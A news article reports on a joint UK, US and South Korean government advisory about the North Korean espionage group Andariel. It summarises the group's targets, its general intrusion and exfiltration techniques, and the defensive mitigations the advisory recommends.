The UK, US and South Korea have warned of a global espionage campaign by a North Korean sponsored cyber threat actor, designed to further the regime’s military and nuclear ambitions.
The joint government advisory detailed how the group, known as Andariel, has compromised critical national infrastructure (CNI) organizations to access sensitive and classified technical information and intellectual property data.
The threat actor primarily targets organizations in the defense, aerospace, energy, nuclear and engineering entities to exfiltrate information such as contract specification, design drawings and project details.
The group acts on behalf of the PyongYang regime, which uses the insights gathered to enhance its military and nuclear programs.
Andariel has also been observed pursuing ransomware attacks against US healthcare organizations as a means of raising funds to finance further espionage activity.
The authoring agencies assess that Andariel is part of the Democratic People’s Republic of Korea (DPRK) Reconnaissance General Bureau (RGB) 3rd Bureau.
Read now: Cybercrime a Key Revenue Stream For North Korea's Weapons Program
The group and its cyber techniques remain an ongoing threat to various industry sectors worldwide.
Paul Chichester, Director of Operations at the UK's National Cyber Security Centre (NCSC), commented: “The global cyber espionage operation that we have exposed today shows the lengths that DPRK state-sponsored actors are willing to go to pursue their military and nuclear programs.”
He added: “It should remind critical infrastructure operators of the importance of protecting the sensitive information and intellectual property they hold on their systems to prevent theft and misuse.”
How Andariel Targets CNI Organizations
The advisory highlighted that Andariel primarily exploits known software vulnerabilities, such as Log4j, to gain initial access into target networks.
The group likely identifies vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers.
Read now: Vulnerabilities Now Top Initial Access Route For Ransomware
Andariel has researched a number of major vulnerabilities as part of its reconnaissance process. These include Apache ActiveMQ, MOVEIt, Barracuda Email Security Gateway, GoAnywhere MFT and Log4j.
Following initial access, the group leverages custom tools and malware for discovery and execution. This includes the development of a vast range of RATs to enable remote access, manipulation of systems and lateral movement.
These tools contain functionality designed for data discovery and exfiltration, including executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2).
Andariel also leverages open source malware tools, such as 3Proxy, AysncRAT and WinRAR.
The use of such publicly available malware helps the attackers conceal and obfuscate their identities, making attribution harder.
Living-off-the-Land Techniques
The threat actors are well versed in living-off-the-land techniques – using native tools and processes within compromised networks. These tools are used to assist actions such as defense evasion, credential access, discovery and lateral movement.
These include legitimate tools such as Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC).
Andariel has preference for using netstat commands, the agencies observed. Often, typos and other mistakes are made, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach, as well as the attackers having a poor grasp of the English language.
The actors routinely pack late-stage tooling in VMProtect and Themida, which have advanced anti-debugging and detection capabilities.
They change the settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials.
Infrastructure positioned around the world are used to send commands to compromised systems, with malware disguised within HTTP packets to appear as benign network traffic.
Data Exfiltration
For data exfiltration, the threat actors use malware they previously placed in the network to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean.
They then identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The relevant files are collected into RAR archives.
Finally, the data is exfiltrated to web services such as cloud storage or servers not associated with their primary C2, including logging into actor-controlled cloud-based service accounts directly from victim networks.
The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols.
How to Mitigate Andariel Attacks
The advisory set out a range of areas CNI defenders should focus on to mitigate the tactics employed by Andariel. These include:
- Identify assets affected by the Log4j vulnerability, and upgrade them to the latest versions
- Prevent exploitation of web-facing servers by maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs)
- Deploy endpoint agencies or other monitoring mechanisms to prevent and detect further adversary activity
- Monitor for suspicious command-line activity, implement multi-factor authentication for remote access services, and properly segment and using allow-listing tools for critical assets
- Encrypt all sensitive data including personal information
- Block access to unused ports
- Change passwords when they are suspected of being compromised